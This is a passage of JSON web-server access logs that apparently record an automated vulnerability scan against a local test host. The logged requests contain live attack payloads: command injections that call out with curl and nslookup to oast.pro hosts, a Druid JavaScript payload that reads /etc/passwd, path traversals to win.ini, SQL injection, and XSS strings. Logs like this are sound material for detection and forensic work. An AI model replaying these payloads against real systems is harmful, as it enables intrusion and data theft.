Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///;@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /darkstat/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_adminer.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x22command\x22:\x22setWanPortSt\x22,\x22proto\x22:\x22dhcp\x22,\x22port\x22:\x224\x22,\x22vlan_tagged\x22:\x221\x22,\x22vlanid\x22:\x225\x22,\x22mtu\x22:\x22; curl ca28bc0smpvbbtig07h0uxyhp7qxzt1hn.oast.pro;\x22,\x22data\x22:\x22hi\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ztp/cgi-bin/handler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/woocommerce/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)'' HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /forum/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nbproject/project.properties HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"fullPath=/Windows/win.ini","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileDownload?action=downloadBackupFile HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\x5Cwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /files/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authenticationendpoint/29kbxycynhcej128jm0x3xtvfe3.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /version.web HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /alps/profile HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /objects/nuclei.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/ManageFilters.jspa?filter=popular&filterView=popular HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /adminer/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spaces/viewdefaultdecorator.action?decoratorName HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5C..\x5Cwindows\x5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.028","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /download.do?file=../../../../config.text HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /svnserve.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"{\x0D\x0A\x22type\x22:\x22index\x22,\x0D\x0A\x22spec\x22:{\x0D\x0A \x22ioConfig\x22:{\x0D\x0A \x22type\x22:\x22index\x22,\x0D\x0A \x22firehose\x22:{\x0D\x0A \x22type\x22:\x22local\x22,\x0D\x0A \x22baseDir\x22:\x22/etc\x22,\x0D\x0A \x22filter\x22:\x22passwd\x22\x0D\x0A }\x0D\x0A },\x0D\x0A \x22dataSchema\x22:{\x0D\x0A \x22dataSource\x22:\x22odgjxrrrePz\x22,\x0D\x0A \x22parser\x22:{\x0D\x0A \x22parseSpec\x22:{\x0D\x0A \x22format\x22:\x22javascript\x22,\x0D\x0A \x22timestampSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22dimensionsSpec\x22:{\x0D\x0A\x0D\x0A },\x0D\x0A \x22function\x22:\x22function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\x5C\x22/bin/sh`@~-c`@~cat /etc/passwd\x5C\x22.split(\x5C\x22`@~\x5C\x22)).getInputStream()).useDelimiter(\x5C\x22\x5C\x5CA\x5C\x22).next();return {timestamp:\x5C\x224137368\x5C\x22,OQtGXcxBVQVL: hTVCCerYZ}}\x22,\x0D\x0A \x22\x22:{\x0D\x0A \x22enabled\x22:\x22true\x22\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A},\x0D\x0A\x22samplerConfig\x22:{\x0D\x0A \x22numRows\x22:10\x0D\x0A}\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/indexer/v1/sampler HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:00 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /icons/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"\x0D\x0A supervisor.supervisord.options.warnings.linecache.os.system\x0D\x0A \x0D\x0A \x0D\x0A nslookup ca28bc0smpvbbtig07h0kwijmr1hj5ik3.oast.pro\x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /RPC2 HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5C@example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /XmlPeek.aspx?dt=\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5C..\x5C\x5CWindows\x5C\x5Cwin.ini&x=/validate.ashx?requri HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/package/cfajax.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /editor.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Kenesto/Account/LogOn?ReturnUrl=%2fkenesto HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/apidocs HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /session HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpmyadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scripts/wa.exe?OK=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tiki-login_scr.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /configure/app/landing/welcome-srm-va.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /email/unsubscribed?email=test@gmail.com%27\x5C%22%3E%3Csvg/onload=alert(xss)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /misc.php?action=showpopups&type=friend HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /maxsite/page/1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:01 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/querybuilder.json.servlet HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", 